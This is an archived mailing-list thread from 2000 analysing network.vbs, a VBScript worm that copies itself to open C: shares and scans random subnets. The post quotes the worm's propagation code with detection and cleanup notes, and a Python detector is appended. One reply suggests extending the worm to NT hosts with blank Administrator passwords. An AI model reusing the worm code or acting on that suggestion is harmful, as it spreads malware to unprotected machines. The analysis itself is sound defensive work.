Security Incidents mailing list archives
Re: Lame Windows Worm
From: sozni () USA NET (.sozni)
Date: Mon, 28 Feb 2000 09:03:56 MST
I'd say this script isn't so lame if it managed to install itself onto your friend's startup group. In fact, the brilliant thing about this little script is that it demonstrates that one doesn't have to know much about networks or even programming to create their own internet worm. It is funny to me that you so harshly criticize the script and yet you say that a precondition is that one must have their entire C drive shared without a password! And the worst thing about this whole scenario is that this "lame" little script will probably very easily replicate itself across the millions of shared and unpassworded C drives out there. What I would do to this script is add in a bit of code that also looks for NT systems with blank Administrator passwords, probably doubling the ground the worm covers.

.sozni

----- Original Message -----
From: "Chris Brenton" <cbrenton () sover net>
To: <INCIDENTS () SECURITYFOCUS COM>
Sent: Saturday, February 26, 2000 9:23 PM
Subject: Lame Windows Worm

Greetings all,

I had a friend running WinProxy on a Windows 98 machine run across a file named network.vbs in their startup group. I ran it past the Dartmouth college security institute and this is what they came up with. The attack is somewhat lame but has the potential to waste quite a bit of bandwidth. Since it was found in the wild, it's obviously making the rounds. The script appears to be a direct rip off of the c:\windows\samples\wsh\network.vbs script included with Windows 98. Guess the purp could not even be bothered to write their own code. ;)

Affected Systems: Windows 95 and Windows 98
Method of infection: File copy via file shares
Special conditions required: Drive "C" must be shared read/write with no password
How to tell if you are infected: Look for network.vbs in the startup group
How to clean it: Remove network.vbs from the startup group ;)

Code analysis: Interesting bits pasted below with added commentary

------
do
  do while driveconnected = "0"
    checkaddress()
    shareformat()
    wshnetwork.mapnetworkdrive "j:", sharename
    enumdrives()
  loop
  copyfiles()
  disconnectdrive()
loop

The main purpose of the script can be seen here. It's designed to create share mappings with other Windows systems and then copy over files.

------
function checkfile()
  If (fso1.fileexists("c:\network.log")) then
    fso1.deletefile("c:\network.log")
  createlogfile()

The script creates a log file. This gives a good clue as to infection. If you have this file on your system, you may be infected.

------
fso.copyfile "c:\network.vbs", "j:\"
fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\wind95\"

Geesh, how many copies of the file do you need to infect the target system? Lines 2 and 6 would be sufficient. Speaks of an amateur that didn't really know what they were doing so they just kept adding copy jobs till it worked consistently. ;)

A couple of points worth noting:
- The entire "C" drive must be shared to get infected
- This script is targeted at Windows 95 & 98 systems
- You can see if you are infected by looking for network.vbs in startup group

------
function checkaddress()
  octd = octd + 1
  if octd = "255" then randaddress()
end function

function shareformat()
  sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
end function

Here's where things start to get nasty. The system figures out who to infect next by enumerating the local address and walking the subnet. This should trigger any IDS system tuned in to hosts performing a service scan for NetBIOS/IP.

------
function randum()
  rand = int((254 * rnd) + 1)
end function

function randaddress()
  if count < 50 then
    octa=Int((16) * Rnd + 199)
    count=count + 1
  else

Guess it's not enough to infect the local subnet, this script then goes out and probes random hosts in the 199.x.x.x to 215.x.x.x subnet ranges. This is done 50 times before moving on to the section of the script below.

------
    randum()
    octa= rand
  end if
  randum()
  octb=rand
  randum()
  octc=rand
  octd="1"
  myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")
end function

Start checking random subnets and log them to the c:\network.log file. One interesting point here is the script specifically targets x.x.x.1 addresses. Again speaks to an amateur as a .1 address will typically be occupied by a router, not a Windows machine.

So this script is nothing severe but could be a nasty waste of bandwidth in the wrong environment. This script could be a real pain on a cable or DSL environment. It could also be trouble in a corporate environment on a Monday morning when everyone powers back up for the first time.

HTH,
Chris
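A defender-side detection for the propagation pattern Chris describes (a host walking its own /24 on the NetBIOS session port, then probing the .1 address of random /24s), written here as an added example that is not part of this thread. It runs over constructed connection-log lines in an assumed "src dst dport" format; the thresholds are assumptions, not values from the post.

```python
import ipaddress
from collections import defaultdict

# Constructed sample log (not from the original post), one "src dst dport" per line:
# 10.0.5.23 sweeps its /24 on TCP 139 (the checkaddress()/shareformat() loop),
# then hits the .1 host of several random /24s (the randaddress() phase).
SAMPLE_LOG = (
    [f"10.0.5.23 10.0.5.{i} 139" for i in range(1, 60)]
    + [f"10.0.5.23 {a}.{b}.{c}.1 139"
       for a, b, c in [(201, 17, 88), (210, 3, 9), (199, 250, 4), (214, 77, 31), (205, 8, 120)]]
    + ["10.0.5.40 10.0.5.2 445", "10.0.5.40 10.0.5.9 139"]   # benign neighbour traffic
)


def parse(line):
    """Split one 'src dst dport' record into (src str, dst IPv4Address, dport int)."""
    src, dst, dport = line.split()
    return src, ipaddress.ip_address(dst), int(dport)


def detect_smb_sweeps(lines, walk_threshold=20, rand_threshold=4):
    """Flag sources whose port-139 traffic looks like the network.vbs loop.

    subnet_walk: /24s in which the source touched >= walk_threshold distinct hosts
    random_dot1: number of /24s where the only host contacted was the .1 address
    Returns {src: {"subnet_walk": [...], "random_dot1": n}} for flagged sources.
    """
    per_src = defaultdict(lambda: defaultdict(set))      # src -> /24 -> hosts hit
    for line in lines:
        src, dst, dport = parse(line)
        if dport != 139:                                  # NetBIOS session port only
            continue
        net = ipaddress.ip_network(f"{dst}/24", strict=False)
        per_src[src][net].add(dst)

    findings = {}
    for src, nets in per_src.items():
        walked = sorted(str(n) for n, hosts in nets.items() if len(hosts) >= walk_threshold)
        dot1 = sum(1 for hosts in nets.values()
                   if len(hosts) == 1 and int(next(iter(hosts))) & 0xFF == 1)
        if walked or dot1 >= rand_threshold:
            findings[src] = {"subnet_walk": walked, "random_dot1": dot1}
    return findings


if __name__ == "__main__":
    for src, info in detect_smb_sweeps(SAMPLE_LOG).items():
        print(src, info)
```

The same logic applies to real firewall or NetBIOS session logs once `parse` is adapted to their field layout.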
Current thread:
- Lame Windows Worm Chris Brenton (Feb 26)
- <Possible follow-ups>
- Re: Lame Windows Worm .sozni (Feb 28)
- Re: Lame Windows Worm Chris Brenton (Feb 28)